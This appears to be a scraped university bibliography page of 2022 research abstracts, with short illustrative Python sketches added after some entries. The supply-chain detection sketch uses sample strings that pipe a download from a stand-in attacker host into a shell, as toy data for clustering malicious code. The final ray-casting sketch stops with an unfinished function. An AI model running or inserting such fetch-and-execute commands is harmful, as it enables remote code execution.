H-BRS Bibliography
Since Socrates, the question "What makes a happy life?" has been the starting point for the development of a variety of theories of well-being. The core of this essay is a discussion of the extent to which the concept of empirical life satisfaction, and the correlates obtained through it, contribute to answering this question, and whether these answers can ground a theory of well-being that links philosophical theory with empirical findings.
At the center of this essay is a discussion of the most important theories of well-being, their merits, commonalities, and differences. One focus is the theory of subjective life satisfaction. I discuss the strengths and weaknesses of the concept and give an overview of the most important results of empirical life-satisfaction research.
In conclusion, I argue that the results of empirical research can serve as the basis for a subjective-objective theory of well-being. High-quality interpersonal relationships, a healthy lifestyle, a balanced work-life balance, commitment to others, and the pursuit of life goals and personal interests form the foundation of a theory of well-being grounded in empirical life-satisfaction research.
Was ist ein Labor?
(2022)
Technical progress in the collection, storage, and processing of data makes it necessary to raise new questions about socially acceptable data markets. There is both a tendency toward simplified data sharing and a demand for better protection of informational self-determination. The idea of data trustees operates within this field of tension. The aim of this contribution is to show that different forms of data trusteeship should be distinguished in order to do justice to the complexity of the topic. In particular, alongside multilateral trusteeship, with the trustee as a neutral intermediary, there is also a need for unilateral trusteeship, in which the trustee acts as an advocate of consumer interests. From this perspective, the model of data trusteeship is systematically developed as a representative interpretation of the interests of individual and collective identities.
Vorwort
(2022)
Vorwort
(2022)
Personal information management systems (PIMS) are regarded as an opportunity to strengthen consumers' data sovereignty. Data protection questions become relevant for consumers wherever they enter into contracts and terms of use with service providers. Against this background, this contribution discusses the potential of VRM systems, which support not only consumers' data management but their entire contract management. We examine whether these are better suited to enabling consumers to act autonomously.
Unlimited paid time off policies are currently fashionable and widely discussed by HR professionals around the globe. While on the one hand, paid time off is considered a key benefit by employees and unlimited paid time off policies (UPTO) are seen as a major perk which may help in recruiting and retaining talented employees, on the other hand, early adopters reported that employees took less time off than previously, presumably leading to higher burnout rates. In this conceptual review, we discuss the theoretical and empirical evidence regarding the potential effects of UPTO on leave utilization, well-being and performance outcomes. We start out by defining UPTO and placing it in a historical and international perspective. Next, we discuss the key role of leave utilization in translating UPTO into concrete actions. The core of our article constitutes the description of the effects of UPTO and the two pathways through which these effects are assumed to unfold: autonomy need satisfaction and detrimental social processes. We moreover discuss the boundary conditions which facilitate or inhibit the successful utilization of UPTO on individual, team, and organizational level. In reviewing the literature from different fields and integrating existing theories, we arrive at a conceptual model and five propositions, which can guide future research on UPTO. We conclude with a discussion of the theoretical and societal implications of UPTO.
Microarray-based experiments revealed that thyroid hormone triiodothyronine (T3) enhanced the binding of Cy5-labeled ATP on heat shock protein 90 (Hsp90). By molecular docking experiments with T3 on Hsp90, we identified a T3 binding site (TBS) near the ATP binding site on Hsp90. A synthetic peptide encoding HHHHHHRIKEIVKKHSQFIGYPITLFVEKE derived from the TBS on Hsp90 showed, in MST experiments, the binding of T3 at an EC50 of 50 μM. The binding motif can influence the activity of Hsp90 by hindering ATP accessibility or the release of ADP.
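The reported EC50 is the kind of parameter typically obtained by fitting a dose-response model to binding data. Purely as an illustrative sketch (not the study's actual MST analysis; the data points below are made up, noise-free, and generated from the model itself), a Hill-equation fit might look like:

```python
# Hedged illustration: estimating an EC50 by fitting a Hill equation
# to synthetic dose-response data. All values here are hypothetical.
import numpy as np
from scipy.optimize import curve_fit

def hill(c, top, ec50, n):
    """Hill equation: fractional response at ligand concentration c."""
    return top * c**n / (ec50**n + c**n)

conc = np.array([1, 3, 10, 30, 100, 300, 1000], dtype=float)  # µM
resp = hill(conc, top=1.0, ec50=50.0, n=1.0)  # noise-free toy data

# Fit recovers the parameters used to generate the toy data
popt, _ = curve_fit(hill, conc, resp, p0=(1.0, 10.0, 1.0))
print(f"fitted EC50: {popt[1]:.1f} µM")
```

With real (noisy) measurements, the fitted EC50 would carry an uncertainty estimate from the covariance matrix that `curve_fit` also returns.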
It is challenging to provide users with a haptic weight sensation of virtual objects in VR since current consumer VR controllers and software-based approaches such as pseudo-haptics cannot render appropriate haptic stimuli. To overcome these limitations, we developed a haptic VR controller named Triggermuscle that adjusts its trigger resistance according to the weight of a virtual object. Therefore, users need to adapt their index finger force to grab objects of different virtual weights. Dynamic and continuous adjustment is enabled by a spring mechanism inside the casing of an HTC Vive controller. In two user studies, we explored the effect on weight perception and found large differences between participants for sensing change in trigger resistance and thus for discriminating virtual weights. The variations were easily distinguished and associated with weight by some participants while others did not notice them at all. We discuss possible limitations, confounding factors, how to overcome them in future research and the pros and cons of this novel technology.
Trojanized software packages used in software supply chain attacks constitute an emerging threat. Unfortunately, there is still a lack of scalable approaches that allow automated and timely detection of malicious software packages, and thus most detections are based on manual labor and expertise. However, it has been observed that most attack campaigns comprise multiple packages that share the same or similar malicious code. We leverage that fact to automatically reproduce manually identified clusters of known malicious packages that have been used in real-world attacks, thus reducing the need for expert knowledge and manual inspection. Our approach, AST Clustering using MCL to mimic Expertise (ACME), yields promising results with an F1 score of 0.99. Signatures are automatically generated based on characteristic code fragments from clusters and are subsequently used to scan the whole npm registry for unreported malicious packages. We were able to identify and report six malicious packages, which were subsequently removed from npm. Our approach can therefore support detection by reducing manual labor and may be employed by maintainers of package repositories to detect possible software supply chain attacks through trojanized software packages.
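ACME's actual pipeline is not detailed in the abstract. Purely as a sketch of the underlying idea of grouping structurally similar code via its AST, the toy example below compares AST node-type histograms and groups snippets greedily by cosine similarity. The snippets, the threshold, and the greedy single-link grouping (rather than MCL) are all illustrative choices of this sketch, not ACME's method:

```python
# Toy AST-similarity clustering sketch (NOT the ACME pipeline):
# fingerprint each snippet by its AST node-type histogram, then
# group snippets whose fingerprints are nearly identical.
import ast
from collections import Counter
from math import sqrt

def ast_fingerprint(source):
    """Histogram of AST node types as a crude structural fingerprint."""
    return Counter(type(n).__name__ for n in ast.walk(ast.parse(source)))

def cosine(a, b):
    keys = set(a) | set(b)
    dot = sum(a[k] * b[k] for k in keys)
    return dot / (sqrt(sum(v * v for v in a.values())) *
                  sqrt(sum(v * v for v in b.values())))

def cluster(snippets, threshold=0.95):
    """Greedy single-link grouping of structurally similar snippets."""
    fps = [ast_fingerprint(s) for s in snippets]
    clusters = []
    for i, fp in enumerate(fps):
        for c in clusters:
            if any(cosine(fp, fps[j]) >= threshold for j in c):
                c.append(i)
                break
        else:
            clusters.append([i])
    return clusters

# Two structurally identical "malicious" snippets and one unrelated one
snippets = [
    "import os\nos.system('curl evil.example | sh')",
    "import os\nos.system('curl evil2.example | sh')",
    "def add(a, b):\n    return a + b",
]
print(cluster(snippets))  # → [[0, 1], [2]]
```

A graph-clustering algorithm such as MCL, as used by ACME, operates on the full pairwise similarity graph instead of this greedy pass, which makes it robust to chains of partial similarity.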
Therapeutic Treatments for Osteoporosis-Which Combination of Pills Is the Best among the Bad?
(2022)
Osteoporosis is a chronic, systemic skeletal disorder characterized by an increase in bone resorption, which leads to reduced bone density. The reduction in bone mineral density, and therefore low bone mass, results in an increased risk of fractures. Osteoporosis is caused by an imbalance in the normally strictly regulated bone homeostasis: bone-resorbing osteoclasts become overactive, while bone-synthesizing osteoblasts do not compensate for this. In this review, the mechanism is presented, underlined by in vitro and animal models used to investigate this imbalance, as well as the current status of clinical trials. Furthermore, new therapeutic strategies for osteoporosis are presented, such as anabolic and catabolic treatments and treatments using biomaterials and biomolecules. Another focus is on new combination therapies with multiple drugs, which are currently considered more beneficial for the treatment of osteoporosis than monotherapies. Taken together, this review starts with an overview and ends with the newest approaches to osteoporosis therapies and a future perspective not presented so far.
The Poverty Reduction Effect of Social Protection: The Pros and Cons of a Multidisciplinary Approach
(2022)
There is a growing body of knowledge on the complex effects of social protection on poverty in Africa. This article explores the pros and cons of a multidisciplinary approach to studying social protection policies. Our research aimed to study the interaction between cash transfers and social health protection policies in terms of their impact on inclusive growth in Ghana and Kenya. It also explored the policy reform context over time to unravel programme dynamics and outcomes. The analysis combined econometric and qualitative impact assessments with national- and local-level political economic analyses. In particular, dynamic effects and improved understanding of processes are well captured by this approach, thus pushing the understanding of implementation challenges over and beyond a ‘technological fix,’ as has been argued before by Niño-Zarazúa et al. (World Dev 40:163–176, 2012). However, multidisciplinary research puts considerable demands on data and data handling. Finally, some poverty reduction effects play out over a longer time, requiring consistent longitudinal data that is still scarce.
Background: Since presenteeism is related to numerous negative health and work-related effects, measures are required to reduce it. There are initial indications that how an organization deals with health has a decisive influence on employees’ presenteeism behavior.
Aims: The concept of health-promoting collaboration was developed on the basis of these indications. As an extension of healthy leadership it includes not only the leader but also co-workers. In modern forms of collaboration, leaders cannot be assigned sole responsibility for employees’ health, since the leader is often hardly visible (digital leadership) or there is no longer a clear leader (shared leadership). The study examines the concept of health-promoting collaboration in relation to presenteeism. Relationships between health-promoting collaboration, well-being and work ability are also in focus, regarding presenteeism as a mediator.
Methods: The data comprise the findings of a quantitative survey of 308 employees at a German university of applied sciences. Correlation and mediator analyses were conducted.
Results: The results show a significant negative relationship between health-promoting collaboration and presenteeism. Significant positive relationships were found between health-promoting collaboration and both well-being and work ability. Presenteeism was identified as a mediator of these relationships.
Conclusion: The relevance of health-promoting collaboration in reducing presenteeism was demonstrated, and various starting points for practice were proposed. Future studies should investigate this newly developed concept further in relation to presenteeism.
Digitalization and the use of information and communication technologies (ICT) have led not only to higher productivity but also to new forms of psychological stress in working and private life. The stress experience associated with the use of ICT is referred to in the literature as technostress. Research on this topic shows that the emergence of technostress depends on individual factors. The personality of ICT users determines not only the occurrence of technostress but also influences its health- and performance-related consequences. This literature review systematically summarizes the state of research on the role of personality differences in the emergence of technostress and its consequences. The relevant research articles are evaluated with respect to the variables used, samples and study designs, statistical methods, theories, and frameworks. Finally, the current state of research is put into context and research gaps are identified.
This paper investigates the effect of voltage sensors on the measurement of transient voltages for power semiconductors in a Double Pulse Test (DPT) environment. We adapt previously published models that were developed for current sensors and apply them to voltage sensors to evaluate their suitability for DPT applications. Similarities and differences between transient current and voltage sensors are investigated, and the resulting methodology is applied to commercially available and experimental voltage sensors. Finally, a selection aid for given measurement tasks is derived that focuses on the measurement of fast-switching power semiconductors.
For decades, the liquid that symbolically represents menstrual blood in commercials was blue; only in September 2021 did a manufacturer for the first time show a liquid realistically depicted in red (1). With few exceptions, hygiene products that menstruating people urgently need are not available in public toilets in Germany: this invisibility revealed, even in 2021, the taboo surrounding natural biological processes of the female body. Shame and avoidable restrictions are the consequence. Menstruating people are limited in their well-being, and negative experiences mean that those affected are impaired in carrying out social, school, and professional activities, not only by menstruation itself but also by norms and patterns of upbringing, as numerous international studies have shown (2). For the German higher education context, such studies have so far been lacking.
In young adulthood, important foundations are laid for health later in life. Hence, more attention should be paid to the health measures concerning students. A research field that is relevant to health but hitherto somewhat neglected in the student context is the phenomenon of presenteeism. Presenteeism refers to working despite illness and is associated with negative health and work-related effects. The study attempts to bridge the research gap regarding students and examines the effects of and reasons for this behavior. The consequences of digital learning on presenteeism behavior are moreover considered. A student survey (N = 1036) and qualitative interviews (N = 11) were conducted. The results of the quantitative study show significant negative relationships between presenteeism and health status, well-being, and ability to study. An increased experience of stress and a low level of detachment as characteristics of digital learning also show significant relationships with presenteeism. The qualitative interviews highlighted the aspect of not wanting to miss anything as the most important reason for presenteeism. The results provide useful insights for developing countermeasures to be easily integrated into university life, such as establishing fixed learning partners or the use of additional digital learning material.
MOTIVATION
The majority of biomedical knowledge is stored in structured databases or as unstructured text in scientific publications. This vast amount of information has led to numerous machine learning-based biological applications using either text through natural language processing (NLP) or structured data through knowledge graph embedding models (KGEMs). However, representations based on a single modality are inherently limited.
RESULTS
To generate better representations of biological knowledge, we propose STonKGs, a Sophisticated Transformer trained on biomedical text and Knowledge Graphs (KGs). This multimodal Transformer uses combined input sequences of structured information from KGs and unstructured text data from biomedical literature to learn joint representations in a shared embedding space. First, we pre-trained STonKGs on a knowledge base assembled by the Integrated Network and Dynamical Reasoning Assembler (INDRA) consisting of millions of text-triple pairs extracted from biomedical literature by multiple NLP systems. Then, we benchmarked STonKGs against three baseline models trained on either one of the modalities (i.e., text or KG) across eight different classification tasks, each corresponding to a different biological application. Our results demonstrate that STonKGs outperforms both baselines, especially on the more challenging tasks with respect to the number of classes, improving upon the F1-score of the best baseline by up to 0.084 (i.e., from 0.881 to 0.965). Finally, our pre-trained model as well as the model architecture can be adapted to various other transfer learning applications.
AVAILABILITY
We make the source code and the Python package of STonKGs available at GitHub (https://github.com/stonkgs/stonkgs) and PyPI (https://pypi.org/project/stonkgs/). The pre-trained STonKGs models and the task-specific classification models are respectively available at https://huggingface.co/stonkgs/stonkgs-150k and https://zenodo.org/communities/stonkgs.
SUPPLEMENTARY INFORMATION
Supplementary data are available at Bioinformatics online.
The utilization of simulation procedures is gaining increasing attention in the product development of extrusion blow molded parts. However, some simulation steps, like the simulation of shrinkage and warpage, are still associated with uncertainties. The reason for this is, on the one hand, a lack of standardized interfaces for the transfer of simulation data between different simulation tools and, on the other hand, the complex time-, temperature- and process-dependent material behavior of the semi-crystalline polymers used. Using a new vendor-neutral interface standard for the data transfer, the shrinkage analysis of a simple blow molded part is investigated and compared to experimental data. A linear viscoelastic material model in combination with an orthotropic process- and temperature-dependent thermal expansion coefficient is used for the shrinkage prediction. A good agreement is observed. Finally, critical parameters in the simulation models that strongly influence the shrinkage analysis are identified by a sensitivity study.
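To give a feel for how a direction-dependent (orthotropic) expansion coefficient enters such a shrinkage estimate, here is a deliberately minimal, hypothetical calculation; the coefficients and temperatures are invented round numbers, not values from the study, and the paper's actual model is viscoelastic and temperature-dependent rather than this single linear step:

```python
# Toy illustration (not the paper's model): linear thermal shrinkage
# with direction-dependent (orthotropic) expansion coefficients.
# All numbers below are hypothetical.

def shrinkage(alpha, t_solid, t_ambient):
    """Relative dimensional change for cooling from t_solid to t_ambient (K or degC)."""
    return alpha * (t_ambient - t_solid)

# Hypothetical coefficients (1/K): extrusion vs. transverse direction
alpha_par, alpha_perp = 1.6e-4, 1.1e-4
dL_par = shrinkage(alpha_par, 120.0, 23.0)    # along extrusion direction
dL_perp = shrinkage(alpha_perp, 120.0, 23.0)  # transverse direction
print(f"shrinkage parallel: {dL_par:.2%}, transverse: {dL_perp:.2%}")
```

The point of the orthotropy is visible even in this sketch: cooling by the same temperature interval produces different dimensional changes along and across the extrusion direction.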
A precise characterization of substances is essential for the safe handling of explosives. One parameter regularly characterized is the impact sensitivity. This is typically determined using a drop hammer. However, the results can vary depending on the test method and even the operator, and it is not possible to distinguish the type of decomposition such as detonation and deflagration. This study monitors the reaction progress by constructing a drop hammer to measure the decomposition reaction of four different primary explosives (tetrazene, silver azide, lead azide, lead styphnate) in order to determine the reproducibility of this method. Additionally, further possible evaluation methods are explored to improve on the current binary statistical analysis. To determine whether classification was possible based on extracted features, the responses of equipped sensor arrays, which measure and monitor the reactions, were studied and evaluated. Features were extracted from this data and were evaluated using multivariate methods such as principal component analysis (PCA) and linear discriminant analysis (LDA). The results indicate that although the measurements show substance specific trends, they also show a large scatter for each substance. By reducing the dimensions of the extracted features, different sample clusters can be represented and the calculated loadings allow significant parameters to be determined for classification. The results also suggest that differentiation of different reaction mechanisms is feasible. Testing of the regressor function shows reliable results considering the comparatively small amount of data.
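The multivariate workflow the abstract names (extracted features, PCA for dimensionality reduction, LDA for classification) can be sketched generically. The data below are synthetic stand-ins for sensor features of three substances; the feature counts, class means, and component numbers are arbitrary choices of this sketch, not values from the study:

```python
# Hedged sketch of the named multivariate workflow: PCA to reduce
# extracted "sensor features", then LDA to separate substance classes.
# The data are synthetic; nothing here reproduces the study's results.
import numpy as np
from sklearn.decomposition import PCA
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis

rng = np.random.default_rng(0)
# Hypothetical data: 3 substances x 40 drop tests x 10 extracted features
n_per, n_feat = 40, 10
X = np.vstack([rng.normal(loc=m, scale=1.0, size=(n_per, n_feat))
               for m in (0.0, 1.5, 3.0)])
y = np.repeat([0, 1, 2], n_per)

X_red = PCA(n_components=3).fit_transform(X)  # reduce feature dimensions
lda = LinearDiscriminantAnalysis().fit(X_red, y)
print(f"training accuracy: {lda.score(X_red, y):.2f}")
```

In practice one would evaluate with held-out data (e.g. cross-validation) rather than training accuracy, especially given the "comparatively small amount of data" the abstract notes.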
The non-scientific questioning of scientific research during the COVID-19 pandemic, the unwillingness of a president of the United States of America to accept the result of a democratically held election: in recent times, there have been quite a few striking examples of long-held certainties turning out to be nothing more than illusions. This essay reflects on the severe consequences of the loss of such certainties in the spheres of democratic politics on the one hand and of science on the other, especially for highly differentiated societies, as well as on their interdependencies. Furthermore, the author tries to make the case that this disillusionment could prove to be a salutary shock, reminding us that we need to take a stand for the things we hold as certainties, oftentimes even as calming ones, if we want them to stay as we always thought they were.
Despite the increasing interest in single family offices (SFOs) as an investment owned by an entrepreneurial family, research on SFOs is still in its infancy. In particular, little is known about the capital structures of SFOs or the roots of SFO heterogeneity regarding financial decisions. By drawing on a hand-collected sample of 104 SFOs and private equity (PE) firms, we compare the financing choices of these two investor types in the context of direct entrepreneurial investments (DEIs). Our data thereby provide empirical evidence that SFOs are less likely to raise debt than PE firms, suggesting that SFOs follow pecking-order theory. Regarding the heterogeneity of the financial decisions of SFOs, our data indicate that the relationship between SFOs and debt financing is reinforced by the idiosyncrasies of entrepreneurial families, such as higher levels of owner management and a higher firm age. Surprisingly, our data do not support a moderating effect for the emphasis placed on socioemotional wealth (SEW).
Robust Identification and Segmentation of the Outer Skin Layers in Volumetric Fingerprint Data
(2022)
Despite the long history of fingerprint biometrics and its use to authenticate individuals, there are still some unsolved challenges with fingerprint acquisition and presentation attack detection (PAD). Currently available commercial fingerprint capture devices struggle with non-ideal skin conditions, including soft skin in infants. They are also susceptible to presentation attacks, which limits their applicability in unsupervised scenarios such as border control. Optical coherence tomography (OCT) could be a promising solution to these problems. In this work, we propose a digital signal processing chain for segmenting two complementary fingerprints from the same OCT fingertip scan: One fingerprint is captured as usual from the epidermis (“outer fingerprint”), whereas the other is taken from inside the skin, at the junction between the epidermis and the underlying dermis (“inner fingerprint”). The resulting 3D fingerprints are then converted to a conventional 2D grayscale representation from which minutiae points can be extracted using existing methods. Our approach is device-independent and has been proven to work with two different time domain OCT scanners. Using efficient GPGPU computing, it took less than a second to process an entire gigabyte of OCT data. To validate the results, we captured OCT fingerprints of 130 individual fingers and compared them with conventional 2D fingerprints of the same fingers. We found that both the outer and inner OCT fingerprints were backward compatible with conventional 2D fingerprints, with the inner fingerprint generally being less damaged and, therefore, more reliable.
Characterization methods for pressure sensitive adhesives (PSAs) originate from technical bonding and do not cover the data relevant to the development and quality assurance of medical applications, where PSAs with flexible backing layers are applied to human skin. In this study, a new method called RheoTack is developed to determine, mechanically and optically, the adhesion and detachment behavior of flexible, transparent PSA-based patches. Transdermal therapeutic systems (TTS) consisting of silicone-based PSAs on a flexible and transparent backing layer were tested on a rotational rheometer with an 8 mm plate as a probe rod at retraction speeds of 0.01, 0.1, and 1 mm/s, recording their adhesion and detachment behavior as force-retraction displacement curves. The curves consist of a compression phase to ensure wetting; a tensile deformation phase capturing stretching, cavity formation, and fibril formation; and a failure phase with detachment. Their analysis provides values for stiffness, the force and displacement at the onset of fibril formation, the force and displacement at the onset of failure due to fibril breakage and detachment, as well as the corresponding activation energies. All these parameters exhibit a pronounced dependency on the retraction speed. The force-retraction displacement curves, together with simultaneous video recordings of the TTS deformation from three different angles (three cameras), provide deeper insight into the deformation processes and allow the characteristics relevant to PSA applications to be interpreted.
SLC6A14 (ATB0,+) is unique among SLC proteins in its ability to transport 18 of the 20 proteinogenic (dipolar and cationic) amino acids and naturally occurring and synthetic analogues (including anti-viral prodrugs and nitric oxide synthase (NOS) inhibitors). SLC6A14 mediates amino acid uptake in multiple cell types where increased expression is associated with pathophysiological conditions including some cancers. Here, we investigated how a key position within the core LeuT-fold structure of SLC6A14 influences substrate specificity. Homology modelling and sequence analysis identified the transmembrane domain 3 residue V128 as equivalent to a position known to influence substrate specificity in distantly related SLC36 and SLC38 amino acid transporters. SLC6A14, with and without V128 mutations, was heterologously expressed and function determined by radiotracer solute uptake and electrophysiological measurement of transporter-associated current. Substituting the amino acid residue occupying the SLC6A14 128 position modified the binding pocket environment and selectively disrupted transport of cationic (but not dipolar) amino acids and related NOS inhibitors. By understanding the molecular basis of amino acid transporter substrate specificity we can improve knowledge of how this multi-functional transporter can be targeted and how the LeuT-fold facilitates such diversity in function among the SLC6 family and other SLC amino acid transporters.
The cooperation between researchers and practitioners during the different stages of the research process is promoted as it can benefit both society and research, supporting processes of ‘transformation’. While acknowledging the important potential of research–practice–collaborations (RPCs), this paper reflects on RPCs from a political-economic perspective to also address potential unintended adverse effects on knowledge generation due to divergent interests, incomplete information, or the unequal distribution of resources. Asymmetries between actors may induce distorted and biased knowledge and even help produce or exacerbate existing inequalities. Potential merits and limitations of RPCs, therefore, need to be gauged. Taking RPCs seriously requires paying attention to these possible tensions, both in general and with respect to international development research in particular: on the one hand, there are attempts to contribute to societal change, with ethical concerns of equity at the heart of international development research; on the other hand, there is a comparatively high risk of encountering asymmetries.
In her recent article, Bender discusses several aspects of research–practice–collaborations (RPCs). In this commentary, we apply Bender's arguments to experiences in engineering research and development (R&D). We investigate the influence of interaction with practice partners on relevance, credibility, and legitimacy in the special engineering field of product development and analyze which methodological approaches are already being pursued for dealing with diverging interests and asymmetries and which steps will be necessary to include interests of civil society beyond traditional customer relations.
Research-Practice-Collaborations Addressing One Health and Urban Transformation. A Case Study
(2022)
One Health is an integrative approach at the interface of humans, animals and the environment, which, given its interdisciplinarity and intersectoral focus on the co-production of knowledge, can be implemented as a Research-Practice-Collaboration (RPC). To exemplify this, the present commentary presents the example of the Forschungskolleg “One Health and Urban Transformation” funded by the Ministry of Culture and Science of the State of North Rhine-Westphalia in Germany. The factors identified for a better implementation of RPCs for One Health were those that allowed for constant communication and the reduction of power asymmetries between practitioners and academics in the co-production of knowledge. In this light, training a new generation of scientists at the boundaries of different disciplines, with mediation skills between academia and practice, is an important contribution with great implications for societal change and can aid the further development of RPCs.
Soil nutrient depletion threatens global food security and has been seriously underestimated for potassium (K) and several micronutrients. This is particularly the case for highly weathered soils in tropical countries, where classical soluble fertilizers are often not affordable or not accessible. One way to replenish macro- and micronutrients is the application of ground silicate rock powders (SRPs). Rock-forming silicate minerals contain most nutrients essential for higher plants, yet slow and inconsistent weathering rates have restricted their use in the past. Recent findings, however, challenge past agronomic objections, which insufficiently addressed the factorial complexity of the weathering process. This review therefore first presents a framework with the most relevant factors for the weathering of SRPs, through which several outcomes of prior studies can be explained. A subsequent analysis of 48 crop trials reveals their potential as an alternative K source and multi-nutrient soil amendment for tropical soils, whereas the benefits for temperate soils are currently inconclusive. Beneficial results prevail for mafic and ultramafic rocks like basalts and for rocks containing nepheline or glauconite. Several rock modifications are highly efficient in increasing the agronomic effectiveness of SRPs. Enhanced weathering of SRPs could additionally sequester substantial amounts of CO2 from the atmosphere, and silicon (Si) supply can induce a broad spectrum of plant biotic and abiotic stress resistance. Recycling massive amounts of rock residues from domestic mining industries could furthermore resolve serious disposal challenges and improve fertilizer self-sufficiency. In conclusion, under the right circumstances, SRPs could not only advance low-cost and regional soil-sustaining crop production but also contribute to various sustainable development goals.
Recovery Across Different Temporal Settings: How Lunchtime Activities Influence Evening Activities
(2022)
Recovery from work stress during workday breaks, free evenings, weekends, and vacations is known to benefit employee health and well-being. However, how recovery at different temporal settings is interconnected is not well understood. We hypothesized that on days when employees engage in recovery-enhancing lunchtime activities, they will experience higher resources when leaving work for home (i.e., low fatigue and high positive affect) and consequently spend more time on recovery-enhancing activities in the evening, thus creating a positive recovery cycle. In this study, 97 employees were randomized into lunchtime park walk and relaxation groups. As evening activities, we measured time spent on physical exercise, physical activity in natural surroundings, and social activities. Afternoon resources and time spent on evening activities were assessed twice a week before, during, and after the intervention, for five weeks. Our results based on multilevel analyses showed that on days when employees completed the lunchtime park walk, they spent more time on evening physical exercise and physical activity in natural surroundings compared to days when the lunch break was spent as usual. However, neither lunchtime relaxation exercises nor afternoon resources were associated with any of the evening activities. Our findings suggest that factors other than afternoon resources are more important in determining how much time employees spend on various evening activities. Fifteen-minute lunchtime park walks inspired employees to engage in similar health-benefitting activities during their free time.
Qualität der Qualitätsprüfung: Testberichte im klassischen und modernen Videospieljournalismus
(2022)
The heyday of printed video game journalism around the turn of the millennium is over. For more than 15 years, the circulation of classic video game magazines such as Gamestar or PC Games has been declining. Other magazines have since been discontinued for economic reasons, including PC Action and the former market leader Computer Bild Spiele. Nevertheless, a journalistic countermovement emerged, founded by Kieron Gillen in his 2004 manifesto "The New Games Journalism". In Germany, video game magazines such as GAIN and WASD appeared, whose coverage treats video games less as a product and increasingly as an artistic object, placing them in a societal and cultural context.
Regardless of this, editorial teams carry out a technical and content-related review of video games, which is presented to the audience as a review article. Since, from a historical perspective, this constitutes the core content of video game magazines, it serves as the object of analysis of this thesis and as an indicator of the quality of the magazines as a whole. In view of the divergent developments in video game journalism, the following question is to be answered: Do modern video game magazines offer higher quality than classic magazines? To this end, a qualitative content analysis of the reviews is carried out, together with a comparison against established quality criteria from general journalism as well as from trade, service and video game journalism.
ProtSTonKGs: A Sophisticated Transformer Trained on Protein Sequences, Text, and Knowledge Graphs
(2022)
While most approaches individually exploit unstructured data from the biomedical literature or structured data from biomedical knowledge graphs, their union can better exploit the advantages of such approaches, ultimately improving representations of biology. Using multimodal transformers for such purposes can improve performance on context-dependent classification tasks, as demonstrated by our previous model, the Sophisticated Transformer Trained on Biomedical Text and Knowledge Graphs (STonKGs). In this work, we introduce ProtSTonKGs, a transformer aimed at learning all-encompassing representations of protein-protein interactions. ProtSTonKGs presents an extension to our previous work by adding textual protein descriptions and amino acid sequences (i.e., structural information) to the text- and knowledge graph-based input sequence used in STonKGs. We benchmark ProtSTonKGs against STonKGs, resulting in improved F1 scores by up to 0.066 (i.e., from 0.204 to 0.270) in several tasks such as predicting protein interactions in several contexts. Our work demonstrates how multimodal transformers can be used to integrate heterogeneous sources of information, laying the foundation for future approaches that use multiple modalities for biomedical applications.
The epithelial sodium channel (ENaC) is a heterotrimeric ion channel that plays a key role in sodium and water homeostasis in tetrapod vertebrates. In the aldosterone-sensitive distal nephron, hormonally controlled ENaC expression matches dietary sodium intake to its excretion. Furthermore, ENaC mediates sodium absorption across the epithelia of the colon, sweat ducts, reproductive tract, and lung. ENaC is a constitutively active ion channel and its expression, membrane abundance, and open probability (PO) are controlled by multiple intracellular and extracellular mediators and mechanisms [9]. Aberrant ENaC regulation is associated with severe human diseases, including hypertension, cystic fibrosis, pulmonary edema, pseudohypoaldosteronism type 1, and nephrotic syndrome [9].
Silicon carbide and graphene possess extraordinary chemical and physical properties. Here, these different systems are linked and the changes in structural and dynamic properties are investigated. The simulations were performed with a classical molecular dynamics (MD) approach, in which a graphene layer (N = 240 atoms) was grafted at different distances on top of a 6H-SiC structure (N = 2400 atoms) and onto a 3C-SiC structure (N = 1728 atoms). The distances between the graphene layer and the 6H-SiC are 1.0, 1.3 and 1.5 Å; the distances between the graphene layer and the 3C-SiC are 2.0, 2.3 and 2.5 Å. Each system was equilibrated at room temperature until no further relaxation was observed. The 6H-SiC structure in combination with graphene proves to be more stable than the combination with 3C-SiC, which is clearly reflected in the computed energies. The pair distribution functions were influenced only slightly by the graphene layer, owing to steric and energetic changes, as evident from the small shifts of the C-C distances. Interactions and bonds between graphene and SiC give rise to small shoulders on the high-frequency SiC peaks in the spectra, while the high-frequency graphene peaks are completely absent.
Process-induced changes in the morphology of biodegradable polybutylene adipate terephthalate (PBAT) and polylactic acid (PLA) blends modified with various multifunctional chain-extending cross-linkers (CECLs) are presented. The morphology of unmodified and modified films produced with blown film extrusion is examined in the extrusion direction (ED) and the transverse direction (TD). While FTIR analysis showed only small peak shifts, indicating that the CECLs modify the molecular weight of the PBAT/PLA blend, SEM investigations of the fracture surfaces of blown extrusion films revealed their significant effect on the morphology formed during processing. Due to the combined shear and elongation deformation during blown film extrusion, rather spherical PLA islands were partly transformed into long fibrils, which tended to decay into chains of elliptical islands if cooled slowly. The introduction of CECLs into the blend changed the thickness of the PLA fibrils, modified the interface adhesion, and altered the deformation behavior of the PBAT matrix from brittle to ductile. The results proved that CECLs react selectively with PBAT, PLA, and their interface. Furthermore, the reactions of CECLs with PBAT/PLA induced by the processing depended on the deformation directions (ED and TD), thus resulting in further non-uniformities of blown extrusion films.
Modern GPUs come with dedicated hardware to perform ray/triangle intersections and bounding volume hierarchy (BVH) traversal. While the primary use case for this hardware is photorealistic 3D computer graphics, with careful algorithm design scientists can also use this special-purpose hardware to accelerate general-purpose computations such as point containment queries. This article explains the principles behind these techniques and their application to vector field visualization of large simulation data using particle tracing.
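The mapping from containment queries to ray tracing can be sketched in plain Python (an illustrative sketch, not code from the article): the parity test below is the classic even-odd rule that RT cores evaluate in hardware via ray/triangle intersections. The cube mesh and all names are invented for the example.

```python
# Point-in-mesh via ray casting: shoot a ray from the query point and count
# ray/triangle hits; an odd count means the point is inside the closed mesh.

def ray_triangle_hit(orig, d, v0, v1, v2, eps=1e-9):
    """Moeller-Trumbore ray/triangle intersection; True only for hits in front of the origin."""
    def cross(a, b):
        return [a[1]*b[2]-a[2]*b[1], a[2]*b[0]-a[0]*b[2], a[0]*b[1]-a[1]*b[0]]
    def dot(a, b):
        return sum(x*y for x, y in zip(a, b))
    e1 = [v1[i] - v0[i] for i in range(3)]
    e2 = [v2[i] - v0[i] for i in range(3)]
    p = cross(d, e2)
    det = dot(e1, p)
    if abs(det) < eps:
        return False                       # ray parallel to the triangle plane
    t_vec = [orig[i] - v0[i] for i in range(3)]
    u = dot(t_vec, p) / det
    if u < 0 or u > 1:
        return False
    q = cross(t_vec, e1)
    v = dot(d, q) / det
    if v < 0 or u + v > 1:
        return False
    return dot(e2, q) / det > eps          # count hits ahead of the origin only

def inside(point, triangles, direction=(1.0, 0.1234, 0.5678)):
    """Even-odd rule along an arbitrary (generic) ray direction."""
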